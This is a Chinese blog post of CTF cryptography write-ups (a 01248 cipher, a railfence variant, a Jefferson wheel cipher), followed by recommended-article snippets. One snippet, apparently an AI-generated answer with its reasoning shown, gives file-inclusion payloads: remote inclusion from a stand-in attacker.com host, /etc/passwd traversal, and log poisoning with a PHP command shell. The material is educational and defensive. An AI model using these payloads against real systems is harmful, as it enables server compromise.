攻防世界练习题

最新推荐文章于 2024-11-22 17:42:13 发布
原创 最新推荐文章于 2024-11-22 17:42:13 发布 · 834 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#密码学

本文深入探讨了多种密码学加密技巧,包括云影加密、Railfence变种及转轮机加密,通过实例解析,揭示了传统加密方法的现代应用与破解思路。
幂数加密

最近在攻防世界里面写了一题,叫幂数加密,我就搜索学习了一边幂数加密,例如E是第五个字母5=20+22 所以E加密过之后是02;O是第十五个15=20+21+22+23所以O加密后是0123。
一打开题目:88421012204802244040142242024 80122。傻了。哪来的8嘛。后来了解到了一种加密方式叫云影加密。云影密码是01248密码,与二进制幂加密不同,这个加密法采用的是0作间隔,其他非0数隔开后组合起来相加表示序号1-26之一的字母,例如18 = 1+8 = 9 = I,1248 = 1+2+4+8 = 15 = O这样。

特点:密文中仅存在01248,加密对象仅有字母。

所以答案就出来了。
题目:8842101220480224404014224202480122
改一下:88421/122/48/2244/4/142242/248/122
加一下:23/5/12/12/4/15/14/5
换字母:W/E/L/L/D/O/N/E
所以flag是cyberpeace{WELLDONE}。

Railfence

这是个奇葩类型,用常规工具从2试到20 都不对,但一看就感觉应该是栅栏密码啊。后来查到了一个特殊的栅栏密码叫做WWW的变种
例如:密文为1 2 3 4 5 6 key=3 Rail-fence Cipher

1 . . . 5 . ↘        ↗ ↘
. 2 . 4 . 6  ↘     ↗
. . 3 . . .    ↘ ↗

结果为 1 5 2 4 6 3
长见识了。
附解密网站:http://www.atoolbox.net/Tool.php?Id=777

转轮机加密

题目:
1: < ZWAXJGDLUBVIQHKYPNTCRMOSFE <
2: < KPBELNACZDTRXMJQOYHGVSFUWI <
3: < BDMAIZVRNSJUWFHTEQGYXPLOCK <
4: < RPLNDVHGFCUKTEBSXQYIZMJWAO <
5: < IHFRLABEUOTSGJVDKCPMNZQWXY <
6: < AMKGHIWPNYCJBFZDRUSLOQXVET <
7: < GWTHSPYBXIZULVKMRAFDCEONJQ <
8: < NOZUTWDCVRJLXKISEFAPMYGHBQ <
9: < XPLTDSRFHENYVUBMCQWAOIKZGJ <
10: < UDNAJFBOWTGVRSCZQKELMXYIHP <
11: < MNBVCXZQWERTPOIUYALSKDJFHG <
12: < LVNCMXZPQOWEIURYTASBKJDFHG <
13: < JZQAWSXCDERFVBGTYHNUMKILOP <

密钥为:2,3,7,5,13,12,9,1,8,10,4,11,6
密文为:NFQKSEVOQOFNP
这个他有提示:托马斯·杰斐逊
所以直接搜索到了杰斐逊转轮密码。按照这个密码体系来就好了,第二行放到第一栏,第三行放到第二栏,以此类推。得到下表。
在这里插入图片描述然后把重新排序后的表的排头按密文排列,像这样:在这里插入图片描述
然后为了方便,将每一竖列写出来,因为题目要求小写字母提交,所以我誊的时候就将它转化成了小写字母,如下:
在这里插入图片描述
可以看出唯一一个有意义的是第18个,提交就好了,本题不需要格式,提交小写字母串即可。

本题没有多大难度,就是有耐心即可。

本周总结:不要轻信标题,要保持耐心,多学学传统题型的变种,出题人喜欢变种。
goblin shelly
关注
攻防世界练习题web
果果的csdn
06-12 1281
虽然是考试周,可是实在不想天天刷题,写写CTF,承包一整天的快乐。 工控云管理系统项目管理页面解析漏洞 打开题目,读到源码,进行审计。 <?php if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') { include 'conf...
攻防世界misc高手进阶区funny_video完整版答案
weixin_43501365的博客
07-08 801
cmd:mkvextract “视频文件位置” tracks 2:音频.ogg -c ISO8859-1 默认保存分离后的音频的位置是在安装目录里(具体可参考: 攻防世界 --> funny_video --> 最完整和正确的解答)图形化界面:可以参考(攻防世界之funny_video)拖动提取出的直接到Audacity后报错,需要以文件-导入-原始数据的形式来插入音频,此时就会出现其他文章里没有解决的问题,音频不完整,正确音频长度是30几秒(和视频同长,隐藏的flag部分藏于20s以后)。经过分析,发现时
攻防世界———MISC 高手区题解
热门推荐
小锤队长的博客
10-14 2万+
目录 1,base64stego 2,easycap 3,Avatar 4,What-is-this 5,签到题 6,Training-Stegano-1 7,Excaliflag 8,Get-the-key.txt 9,glance-50 10,4-2 11,misc1 12,embarrass 13,肥宅快乐题 14,小小的PDF 至此 我在攻防世界中已经 遇到...
攻防世界 CRYPTO 新手练习区 答题(1-12题解)
小哈里的博客
10-13 7149
序 传送门:https://adworld.xctf.org.cn/task/ 1、base64 题目描述:元宵节灯谜是一种古老的传统民间观灯猜谜的习俗。 因为谜语能启迪智慧又饶有兴趣,灯谜增添节日气氛,是一项很有趣的活动。 你也很喜欢这个游戏,这不,今年元宵节,心里有个黑客梦的你,约上你青梅竹马的好伙伴小鱼, 来到了cyberpeace的攻防世界猜谜大会,也想着一展身手。 你们一起来到了小孩子叽叽喳喳吵吵闹闹的地方,你俩抬头一看,上面的大红灯笼上写着一些奇奇怪怪的 字符串,小鱼正纳闷呢,你神秘一笑,我知
CTF_WP-攻防世界web题解
qq_63600223的博客
03-25 4208
题目描述:想想初始页面?尝试访问index.php,没反应,返回结果一样用dirbuster扫描一下,发现果然有个index.php,并且大小跟1不一样,并且返回码是302再次尝试访问,还是不行搜索得知,302是被重定向了用burpsuit抓包发送,flag被隐藏,查看headerflag藏在报文头里备份文件搜索得知:php的备份有两种:.php~和.php.bak修改urlindex.php.bak自动下载了一个文件,打开发现flag打开链接是一个维基百科的说明,
ctf 攻防世界练习题writeup(第二部分)
Ohh24的博客
09-07 1044
ctf 攻防世界web2cookie新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 cookie 由题可知本题考查cookie,那么什么是cookie? 新的改变 我们对Markdown编辑器进行了一些功能拓展与
ctf攻防世界练习题writeup(第一部分)
Ohh24的博客
09-01 1240
view source 题目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 用火狐浏览器打开对应网站 发现无法找到对应的flag,此时可以按F12寻找相应的flag 同时,根据题目的提示,也可以搜索view-source:http://相应的网站/进行访问,寻找flag get_post 先用火狐打开相应的网站搜索 根据提示用get方式提交名为a,值为1的变量,...
CTF-----攻防世界练习题(三)
qq_45671431的博客
04-15 2271
CTF学习打卡篇六 1.baby_web 题目描述: 想想初始页面是哪个 题目场景如上图所示。 一看到题目我们应该想到 “index.php” ,index是普遍意义上的“首页”,也就是你输入一个域名后会打开一个页面,基本上就是index.xxxx。那我们就直接在后面地址栏后面输入。 我们会看到flag出现啦! 2.Training-WWW-Robots 题目描述:无 看到题目我们应该会想...
CTF wed安全 (攻防世界练习题
ting_liang的博客
04-02 1695
进入网站发现按钮按不了按F12会查看源代码,会发现disableddisable属性在HTML中, disabled 属性只有两个值:一个是不带值(例如:disabled),表示禁用该元素;另一个是带有任意非空值(例如:disabled="true"),表示禁用该元素并将其状态提交到服务端。右击编辑删除disable后,再次点击flag后得到flag提及即可成功!!!
攻防世界 WEB 新手练习区 答题(1-12题解)
小哈里的博客
10-23 1万+
序 传送门:https://adworld.xctf.org.cn/task/ 1、
攻防世界 MISC 新手练习区 答题(1-12题解)
m0_64037702的博客
06-21 387
题目描述:菜猫给了菜狗一张图,说图下面什么都没有
攻防世界-RE-三题WP
WocW的博客
04-25 1760
1.re2-cpp-is-awesome 分析 打开看看,发现需要一个参数。在IDA里查找这个luck next time,交叉引用 再次交叉引用,发现到main函数。 这里就是关键的对比了,看起来像是v8经过某个处理后与明文表对比。动态调试看看,下端点在v8,发现我们所输入的字符串没有被处理过,那就更简单了,直接最原始的明文对比。 每次将执行到这里会出现一个flag明文,在下面的跳转指...
攻防世界 web(新手模式)题解
2301_79883204的博客
11-17 1654
简单地说,xff是告诉服务器当前请求者的最终ip的http请求头字段,通常可以直接通过修改http头中的X-Forwarded-For字段来仿造请求的最终ip。然后看到它让我们在一POST的方式提交一个变量,这时我们打开HackBar插件,勾选Postdata。X老师上课讲了Robots协议,小宁同学却上课打了瞌睡,赶紧来教教小宁Robots协议是什么吧。X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。根据提示,我们需要用GET方式提交一个名为a,值为1的变量,
攻防世界-Misc题目练习
qq_44813849的博客
08-05 943
1、this_is_flag 这道题目很简单,答案就直接写在了题目描述上,复制粘贴一下就行 2、ext3 从这道题的题目描述中可以看到这一题需要linux系统,所以下载好文件拖到kali里面解决。 strings查看一下有没有flag这样的字符串: strings linux |grep flag 然后我们可以看到一个flag.txt文件.flag可能就在里面。 把这个文件系统挂载到Linux...
2024年网络安全最新CTF_WP-攻防世界web题解(1),2024年最新这原因我服了_攻防世界web新手题答案
2401_84578953的博客
11-22 1251
参考:https://www.cnblogs.com/gradyblog/p/16989750.html查看源码提示source.php并且还提到了一个hint.php,查看提示flag在这个里面先看前面的源码source.phprequest接收参数file,判断是否为空、是否是string、checkfile如果满足,则包含file否则打印滑稽所以应该是要把ffffllllaaaagggg文件包含进file,关键就是怎么绕过checkfile。
攻防世界unserialize3题解
m0_66935689的博客
07-14 231
所以就想出了一个办法,就是php序列化要用的时候就反序列化一样就可以了,口头化一点序列化就是把对象传化成可传输的字符串而反序列化就是将字符串还原成对象(就像乘法和除法一样是互相的逆运算)这道题利用的是反序列化的知识:当被反序列化的字符串对应的属性个数发生改变会使反序列化失效---__wakeup()不可执行,如果不将1改成2那么就直接调用__wakeup()从而返回bad requests。得到输出,大括号前的1是属性的个数将其修改即可绕过__wakeup()使exit()不被执行。//将这个对象序列化。
攻防世界Web新手区题解(超详细)
weixin_52385170的博客
06-21 8215
Web新手区题解
攻防世界XCTF-Pwn入门11题解题报告
ailx10
03-15 1886
Pwn是CTF中至关重要的项目,一般来说都是Linux二进制题目,零基础的同学可以看《程序员的自我修养》,主要题型包括:缓冲区溢出、Return to Libc、格式化字符串、PLT GOT等。攻防世界XCFT刷题信息汇总如下:攻防世界XCTF黑客笔记刷题记录 ~第一题:level0解题报告:首先看看这个程序是啥呗,哦64位Linux可执行程序:IDA看看逻辑,输出一个hello world然后就...
文件包含漏洞习题攻防世界
最新发布
04-03
<think>好的,我现在需要处理用户关于文件包含漏洞的查询,特别是与CTF比赛、攻防世界以及防御方法相关的内容。首先,我需要回忆文件包含漏洞的基础知识,包括它的类型(比如本地文件包含LFI和远程文件包含RFI)、常见触发场景,以及如何利用这些漏洞进行攻击。 接下来,用户提到了CTF习题和实战演练,所以我应该查找相关的CTF题目或平台,比如攻防世界(XCTF)、DVWA、sqli-labs等,是否有涉及文件包含的题目。例如,DVWA中的File Inclusion模块可能是一个常见的练习环境。同时,CTF比赛中可能通过包含特定文件获取flag,或者利用PHP的伪协议(如php://filter)来读取源代码。 然后,用户可能需要具体的漏洞利用步骤,比如如何通过参数传递恶意路径,或者利用日志文件注入代码。此外,防御方法也是关键,比如输入验证、禁用危险函数(allow_url_include)、设置白名单等。 需要注意的是,引用用户提供的参考资料中的内容,比如引用[5]提到的DVWA中的fi漏洞测试,以及引用[3]关于防御webshell的文件监控。同时,要确保回答结构清晰,分点列出漏洞原理、CTF例题、利用方式、防御措施,并生成相关问题。 最后,检查是否满足系统级指令:行内公式用$,独立公式用$$,正确的中文回答,生成相关问题,并正确添加引用标识。确保LaTeX语法正确,比如在提到数学表达式时正确使用$包裹。</think>### 文件包含漏洞详解 #### 一、漏洞原理 文件包含漏洞(File Inclusion)允许攻击者通过动态加载文件的功能(如PHP的`include`、`require`)注入恶意文件路径,分为两类: 1. **本地文件包含(LFI)**:包含服务器本地文件,例如: `http://example.com/index.php?page=../../etc/passwd` 2. **远程文件包含(RFI)**:包含远程服务器文件(需`allow_url_include=On`),例如: `http://example.com/index.php?page=http://attacker.com/shell.txt` #### 二、CTF例题与实战 1. **攻防世界(XCTF)例题** - 题目描述:通过文件包含读取`/flag`文件 - 解法:使用PHP伪协议`php://filter`读取源码 ```http http://target.com/?file=php://filter/convert.base64-encode/resource=flag.php ``` 解码Base64获取flag[^5][^1] 2. **DVWA实战(File Inclusion模块)** - 低安全级别下直接包含`file3.php`触发XSS漏洞[^5] - 高级别需绕过路径限制,例如: `http://192.168.20.48/DVWA/vulnerabilities/fi/?page=file:///var/log/apache2/access.log` #### 三、漏洞利用方式 1. **敏感文件读取** - Linux:`/etc/passwd`、`/proc/self/environ` - Windows:`C:\Windows\system.ini` 2. **日志文件注入** 修改User-Agent为PHP代码,包含日志文件执行命令: ```http GET /?page=/var/log/apache2/access.log HTTP/1.1 User-Agent: <?php system($_GET['cmd']);?> ``` 3. **PHP伪协议利用** - `php://input`:直接执行POST数据 - `data://text/plain,<?php phpinfo();?>` #### 四、防御方法 1. **输入验证** 使用白名单限制包含的文件名,例如: ```php $allowed = ['home.php', 'about.php']; if (in_array($_GET['page'], $allowed)) { include($_GET['page']); } ``` 2. **禁用危险配置** - 设置`allow_url_include=Off` - 关闭错误回显(`display_errors=Off`) 3. **文件监控** 对Web目录实时监控,异常修改立即恢复[^3]
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值